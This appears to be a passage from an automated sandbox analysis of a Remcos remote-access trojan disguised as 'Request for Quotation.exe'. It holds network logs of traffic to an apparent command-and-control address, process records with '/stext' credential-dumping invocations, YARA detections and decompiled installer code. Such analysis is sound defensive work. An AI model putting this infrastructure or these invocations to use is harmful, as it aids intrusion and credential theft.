                                                                              Feb 23, 2021 07:36:07.000315905 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000330925 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000332117 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000346899 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000361919 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000377893 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000384092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000396967 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000413895 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000415087 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000428915 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000437975 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000446081 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000461102 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000468969 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000475883 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000492096 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000499964 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000508070 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000528097 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000545025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000559092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000560999 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000576019 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000592947 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000593901 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000610113 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000612974 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000624895 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000634909 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.000664949 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238056898 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238087893 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238101006 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238117933 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238130093 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238142014 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238153934 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238171101 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238188028 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238207102 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238225937 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238225937 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:07.238240957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238257885 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238274097 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.238289118 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:25.332536936 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:30.053472042 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:30.057986021 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:30.365895033 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:35.055890083 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:35.096524000 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:35.383939981 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:40.057007074 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:40.059710026 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:40.338299036 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:45.059053898 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:45.060870886 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:45.355911970 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:50.074436903 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:50.077605009 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:50.355793953 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:55.077516079 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:55.079380989 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:55.373529911 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:00.080703974 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:00.086631060 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:00.378096104 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:05.094703913 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:05.096642971 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:05.383399010 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:10.100707054 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:10.102817059 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:10.379391909 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:15.101253986 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:15.103574991 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:15.381124973 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:20.105051994 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:20.108186960 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:20.385838032 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:25.113567114 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:25.116960049 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:25.394527912 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:30.119721889 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:30.123833895 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:30.416162014 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:35.121937037 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:35.125305891 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:35.402942896 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:40.130445957 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:40.133066893 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:40.411088943 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:45.135632038 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:45.139297009 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:45.432147026 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:50.191212893 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:50.194943905 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:50.467767000 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:55.146903992 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:55.150768995 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:55.443649054 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:00.162065983 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:00.165205956 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:38:00.458777905 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:05.177947044 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:05.181857109 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:38:05.490008116 CET429949726103.89.88.238192.168.2.4

                                                                              System Behavior

                                                                              General

                                                                              Start time:07:36:00
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Remcos_1, Description: Remcos Payload, Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, Author: kevoreilly
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, Author: unknown
                                                                              Reputation:low

                                                                              General

                                                                              Start time:07:36:01
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Remcos_1, Description: Remcos Payload, Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Remcos_1, Description: Remcos Payload, Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Author: unknown
                                                                              Reputation:low

                                                                              General

                                                                              Start time:07:36:07
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              General

                                                                              Start time:07:36:07
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              General

                                                                              Start time:07:36:08
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Disassembly

                                                                              Code Analysis

                                                                                Executed Functions

                                                                                C-Code - Quality: 86%
                                                                                			_entry_() {
                                                                                				signed int _t42;
                                                                                				intOrPtr* _t47;
                                                                                				CHAR* _t51;
                                                                                				char* _t53;
                                                                                				CHAR* _t55;
                                                                                				void* _t59;
                                                                                				intOrPtr _t61;
                                                                                				int _t63;
                                                                                				int _t66;
                                                                                				signed int _t67;
                                                                                				int _t68;
                                                                                				signed int _t70;
                                                                                				void* _t94;
                                                                                				signed int _t110;
                                                                                				void* _t113;
                                                                                				void* _t118;
                                                                                				intOrPtr* _t119;
                                                                                				char _t122;
                                                                                				signed int _t141;
                                                                                				signed int _t142;
                                                                                				int _t150;
                                                                                				void* _t151;
                                                                                				intOrPtr* _t153;
                                                                                				CHAR* _t156;
                                                                                				CHAR* _t157;
                                                                                				void* _t159;
                                                                                				char* _t160;
                                                                                				void* _t163;
                                                                                				void* _t164;
                                                                                				char _t189;
                                                                                
                                                                                				 *(_t164 + 0x18) = 0;
                                                                                				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                				 *(_t164 + 0x20) = 0;
                                                                                				 *(_t164 + 0x14) = 0x20;
                                                                                				SetErrorMode(0x8001); // executed
                                                                                				_t42 = GetVersion() & 0xbfffffff;
                                                                                				 *0x42f44c = _t42;
                                                                                				if(_t42 != 6) {
                                                                                					_t119 = E00406656(0);
                                                                                					if(_t119 != 0) {
                                                                                						 *_t119(0xc00);
                                                                                					}
                                                                                				}
                                                                                				_t156 = "UXTHEME";
                                                                                				do {
                                                                                					E004065E8(_t156); // executed
                                                                                					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                                                				} while ( *_t156 != 0);
                                                                                				E00406656(0xb);
                                                                                				 *0x42f444 = E00406656(9);
                                                                                				_t47 = E00406656(7);
                                                                                				if(_t47 != 0) {
                                                                                					_t47 =  *_t47(0x1e);
                                                                                					if(_t47 != 0) {
                                                                                						 *0x42f44f =  *0x42f44f | 0x00000040;
                                                                                					}
                                                                                				}
                                                                                				__imp__#17(_t159);
                                                                                				__imp__OleInitialize(0); // executed
                                                                                				 *0x42f518 = _t47;
                                                                                				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
                                                                                				E0040624D("Setup Setup", "NSIS Error");
                                                                                				_t51 = GetCommandLineA();
                                                                                				_t160 = "\"C:\\Users\\jones\\Desktop\\Request for Quotation.exe\" ";
                                                                                				E0040624D(_t160, _t51);
                                                                                				 *0x42f440 = 0x400000;
                                                                                				_t53 = _t160;
                                                                                				if("\"C:\\Users\\jones\\Desktop\\Request for Quotation.exe\" " == 0x22) {
                                                                                					 *(_t164 + 0x14) = 0x22;
                                                                                					_t53 =  &M00435001;
                                                                                				}
                                                                                				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
                                                                                				 *(_t164 + 0x1c) = _t55;
                                                                                				while(1) {
                                                                                					_t122 =  *_t55;
                                                                                					_t172 = _t122;
                                                                                					if(_t122 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					__eflags = _t122 - 0x20;
                                                                                					if(_t122 != 0x20) {
                                                                                						L13:
                                                                                						__eflags =  *_t55 - 0x22;
                                                                                						 *(_t164 + 0x14) = 0x20;
                                                                                						if( *_t55 == 0x22) {
                                                                                							_t55 =  &(_t55[1]);
                                                                                							__eflags = _t55;
                                                                                							 *(_t164 + 0x14) = 0x22;
                                                                                						}
                                                                                						__eflags =  *_t55 - 0x2f;
                                                                                						if( *_t55 != 0x2f) {
                                                                                							L25:
                                                                                							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
                                                                                							__eflags =  *_t55 - 0x22;
                                                                                							if(__eflags == 0) {
                                                                                								_t55 =  &(_t55[1]);
                                                                                								__eflags = _t55;
                                                                                							}
                                                                                							continue;
                                                                                						} else {
                                                                                							_t55 =  &(_t55[1]);
                                                                                							__eflags =  *_t55 - 0x53;
                                                                                							if( *_t55 != 0x53) {
                                                                                								L20:
                                                                                								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                                                								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                                                									L24:
                                                                                									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                                                									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                                                										 *((char*)(_t55 - 2)) = 0;
                                                                                										__eflags =  &(_t55[2]);
                                                                                										E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                                										L30:
                                                                                										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                										GetTempPathA(0x400, _t157);
                                                                                										_t59 = E00403455(_t172);
                                                                                										_t173 = _t59;
                                                                                										if(_t59 != 0) {
                                                                                											L33:
                                                                                											DeleteFileA("1033"); // executed
                                                                                											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
                                                                                											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                                                											if(_t61 != 0) {
                                                                                												L43:
                                                                                												E0040396E();
                                                                                												__imp__OleUninitialize();
                                                                                												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                                                												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                                                													__eflags =  *0x42f4f4;
                                                                                													if( *0x42f4f4 == 0) {
                                                                                														L67:
                                                                                														_t63 =  *0x42f50c;
                                                                                														__eflags = _t63 - 0xffffffff;
                                                                                														if(_t63 != 0xffffffff) {
                                                                                															 *(_t164 + 0x14) = _t63;
                                                                                														}
                                                                                														ExitProcess( *(_t164 + 0x14));
                                                                                													}
                                                                                													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                                                													__eflags = _t66;
                                                                                													_t150 = 2;
                                                                                													if(_t66 != 0) {
                                                                                														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                                                														 *(_t164 + 0x38) = 1;
                                                                                														 *(_t164 + 0x44) = _t150;
                                                                                														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                                                													}
                                                                                													_t67 = E00406656(4);
                                                                                													__eflags = _t67;
                                                                                													if(_t67 == 0) {
                                                                                														L65:
                                                                                														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                                                														__eflags = _t68;
                                                                                														if(_t68 != 0) {
                                                                                															goto L67;
                                                                                														}
                                                                                														goto L66;
                                                                                													} else {
                                                                                														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                                                														__eflags = _t70;
                                                                                														if(_t70 == 0) {
                                                                                															L66:
                                                                                															E0040140B(9);
                                                                                															goto L67;
                                                                                														}
                                                                                														goto L65;
                                                                                													}
                                                                                												}
                                                                                												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                                                												ExitProcess(2);
                                                                                											}
                                                                                											if( *0x42f460 == 0) {
                                                                                												L42:
                                                                                												 *0x42f50c =  *0x42f50c | 0xffffffff;
                                                                                												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
                                                                                												goto L43;
                                                                                											}
                                                                                											_t153 = E00405C10(_t160, 0);
                                                                                											if(_t153 < _t160) {
                                                                                												L39:
                                                                                												_t182 = _t153 - _t160;
                                                                                												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                                                												if(_t153 < _t160) {
                                                                                													_t151 = E004058D4(_t185);
                                                                                													lstrcatA(_t157, "~nsu");
                                                                                													if(_t151 != 0) {
                                                                                														lstrcatA(_t157, "A");
                                                                                													}
                                                                                													lstrcatA(_t157, ".tmp");
                                                                                													_t162 = "C:\\Users\\jones\\Desktop";
                                                                                													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
                                                                                														_push(_t157);
                                                                                														if(_t151 == 0) {
                                                                                															E004058B7();
                                                                                														} else {
                                                                                															E0040583A();
                                                                                														}
                                                                                														SetCurrentDirectoryA(_t157);
                                                                                														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                                                														if(_t189 == 0) {
                                                                                															E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
                                                                                														}
                                                                                														E0040624D(0x430000,  *(_t164 + 0x1c));
                                                                                														_t137 = "A";
                                                                                														_t163 = 0x1a;
                                                                                														 *0x430400 = "A";
                                                                                														do {
                                                                                															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
                                                                                															DeleteFileA(0x429478);
                                                                                															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Request for Quotation.exe", 0x429478, 1) != 0) {
                                                                                																E0040602C(_t137, 0x429478, 0);
                                                                                																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
                                                                                																_t94 = E004058EC(0x429478);
                                                                                																if(_t94 != 0) {
                                                                                																	CloseHandle(_t94);
                                                                                																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                																}
                                                                                															}
                                                                                															 *0x430400 =  *0x430400 + 1;
                                                                                															_t163 = _t163 - 1;
                                                                                														} while (_t163 != 0);
                                                                                														E0040602C(_t137, _t157, 0);
                                                                                													}
                                                                                													goto L43;
                                                                                												}
                                                                                												 *_t153 = 0;
                                                                                												_t154 = _t153 + 4;
                                                                                												if(E00405CD3(_t182, _t153 + 4) == 0) {
                                                                                													goto L43;
                                                                                												}
                                                                                												E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
                                                                                												E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
                                                                                												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                												goto L42;
                                                                                											}
                                                                                											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                                                											while( *_t153 != _t110) {
                                                                                												_t153 = _t153 - 1;
                                                                                												if(_t153 >= _t160) {
                                                                                													continue;
                                                                                												}
                                                                                												goto L39;
                                                                                											}
                                                                                											goto L39;
                                                                                										}
                                                                                										GetWindowsDirectoryA(_t157, 0x3fb);
                                                                                										lstrcatA(_t157, "\\Temp");
                                                                                										_t113 = E00403455(_t173);
                                                                                										_t174 = _t113;
                                                                                										if(_t113 != 0) {
                                                                                											goto L33;
                                                                                										}
                                                                                										GetTempPathA(0x3fc, _t157);
                                                                                										lstrcatA(_t157, "Low");
                                                                                										SetEnvironmentVariableA("TEMP", _t157);
                                                                                										SetEnvironmentVariableA("TMP", _t157);
                                                                                										_t118 = E00403455(_t174);
                                                                                										_t175 = _t118;
                                                                                										if(_t118 == 0) {
                                                                                											goto L43;
                                                                                										}
                                                                                										goto L33;
                                                                                									}
                                                                                									goto L25;
                                                                                								}
                                                                                								_t141 = _t55[4];
                                                                                								__eflags = _t141 - 0x20;
                                                                                								if(_t141 == 0x20) {
                                                                                									L23:
                                                                                									_t15 = _t164 + 0x20;
                                                                                									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                                                									__eflags =  *_t15;
                                                                                									goto L24;
                                                                                								}
                                                                                								__eflags = _t141;
                                                                                								if(_t141 != 0) {
                                                                                									goto L24;
                                                                                								}
                                                                                								goto L23;
                                                                                							}
                                                                                							_t142 = _t55[1];
                                                                                							__eflags = _t142 - 0x20;
                                                                                							if(_t142 == 0x20) {
                                                                                								L19:
                                                                                								 *0x42f500 = 1;
                                                                                								goto L20;
                                                                                							}
                                                                                							__eflags = _t142;
                                                                                							if(_t142 != 0) {
                                                                                								goto L20;
                                                                                							}
                                                                                							goto L19;
                                                                                						}
                                                                                					} else {
                                                                                						goto L12;
                                                                                					}
                                                                                					do {
                                                                                						L12:
                                                                                						_t55 =  &(_t55[1]);
                                                                                						__eflags =  *_t55 - 0x20;
                                                                                					} while ( *_t55 == 0x20);
                                                                                					goto L13;
                                                                                				}
                                                                                				goto L30;
                                                                                			}

































                                                                                0x004038f4
                                                                                0x004038f5
                                                                                0x00403902
                                                                                0x00403915
                                                                                0x0040391d
                                                                                0x00403921
                                                                                0x00403921
                                                                                0x00403929
                                                                                0x0040392e
                                                                                0x00403935
                                                                                0x00403943
                                                                                0x00403945
                                                                                0x0040394b
                                                                                0x0040394d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403937
                                                                                0x0040393d
                                                                                0x0040393f
                                                                                0x00403941
                                                                                0x0040394f
                                                                                0x00403951
                                                                                0x00000000
                                                                                0x00403951
                                                                                0x00000000
                                                                                0x00403941
                                                                                0x00403935
                                                                                0x004037bf
                                                                                0x004037c6
                                                                                0x004037c6
                                                                                0x00403718
                                                                                0x00403790
                                                                                0x00403790
                                                                                0x0040379c
                                                                                0x00000000
                                                                                0x0040379c
                                                                                0x00403721
                                                                                0x00403725
                                                                                0x0040375b
                                                                                0x0040375b
                                                                                0x0040375d
                                                                                0x00403765
                                                                                0x004037d7
                                                                                0x004037d9
                                                                                0x004037e0
                                                                                0x004037e8
                                                                                0x004037e8
                                                                                0x004037f3
                                                                                0x004037f8
                                                                                0x00403807
                                                                                0x0040380b
                                                                                0x0040380c
                                                                                0x00403815
                                                                                0x0040380e
                                                                                0x0040380e
                                                                                0x0040380e
                                                                                0x0040381b
                                                                                0x00403821
                                                                                0x00403827
                                                                                0x0040382f
                                                                                0x0040382f
                                                                                0x0040383d
                                                                                0x00403842
                                                                                0x00403854
                                                                                0x0040385c
                                                                                0x00403862
                                                                                0x0040386e
                                                                                0x00403874
                                                                                0x0040387e
                                                                                0x00403894
                                                                                0x004038a5
                                                                                0x004038ab
                                                                                0x004038b2
                                                                                0x004038b5
                                                                                0x004038bb
                                                                                0x004038bb
                                                                                0x004038b2
                                                                                0x004038bf
                                                                                0x004038c5
                                                                                0x004038c5
                                                                                0x004038ca
                                                                                0x004038ca
                                                                                0x00000000
                                                                                0x00403807
                                                                                0x00403767
                                                                                0x00403769
                                                                                0x00403774
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040377c
                                                                                0x00403787
                                                                                0x0040378c
                                                                                0x00000000
                                                                                0x0040378c
                                                                                0x00403750
                                                                                0x00403752
                                                                                0x00403756
                                                                                0x00403759
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403759
                                                                                0x00000000
                                                                                0x00403752
                                                                                0x004036a2
                                                                                0x004036ae
                                                                                0x004036b3
                                                                                0x004036b8
                                                                                0x004036ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004036c2
                                                                                0x004036ca
                                                                                0x004036db
                                                                                0x004036e3
                                                                                0x004036e5
                                                                                0x004036ea
                                                                                0x004036ec
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004036ec
                                                                                0x00000000
                                                                                0x00403651
                                                                                0x00403612
                                                                                0x00403615
                                                                                0x00403618
                                                                                0x0040361e
                                                                                0x0040361e
                                                                                0x0040361e
                                                                                0x0040361e
                                                                                0x00000000
                                                                                0x0040361e
                                                                                0x0040361a
                                                                                0x0040361c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040361c
                                                                                0x004035cd
                                                                                0x004035d0
                                                                                0x004035d3
                                                                                0x004035d9
                                                                                0x004035d9
                                                                                0x00000000
                                                                                0x004035d9
                                                                                0x004035d5
                                                                                0x004035d7
